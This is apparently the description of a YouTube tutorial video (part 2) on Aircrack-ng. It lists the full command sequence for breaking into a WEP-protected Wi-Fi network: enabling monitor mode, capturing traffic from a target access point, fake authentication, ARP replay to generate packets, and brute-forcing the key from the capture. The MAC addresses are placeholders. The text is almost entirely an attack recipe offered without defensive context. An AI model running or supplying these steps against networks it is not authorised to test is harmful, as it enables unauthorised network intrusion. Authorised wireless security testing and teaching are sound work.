Aircrack-ng Tutorial - PT2Sorry about the lighting ================================================== airmon-ng start wlan0 ================================================== airodump-ng wlan0 ================================================== captures packets to file airodump-ng -c --bssid 00:00:00:00:00:00 -w capture.psk wlan0 ================================================== tests packet injection aireplay-ng -9 -e NETGEAR -a 00:00:00:00:00:00 wlan0 ================================================== fakes authentication aireplay-ng -1 0 -e NETGEAR -a 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0 ================================================== generates packets on the network aireplay-ng -3 -b 00:00:00:00:00:00 -h 00:00:00:00:00:00 wlan0 ================================================== brute force the wep key from captured data aircrack-ng -b 00:00:00:00:00:00 capture.psk*.cap ================================================== code pour embarquer la vidéo : >>> http://www.youtube.com/embed/lzxmD-TmpGk <<< |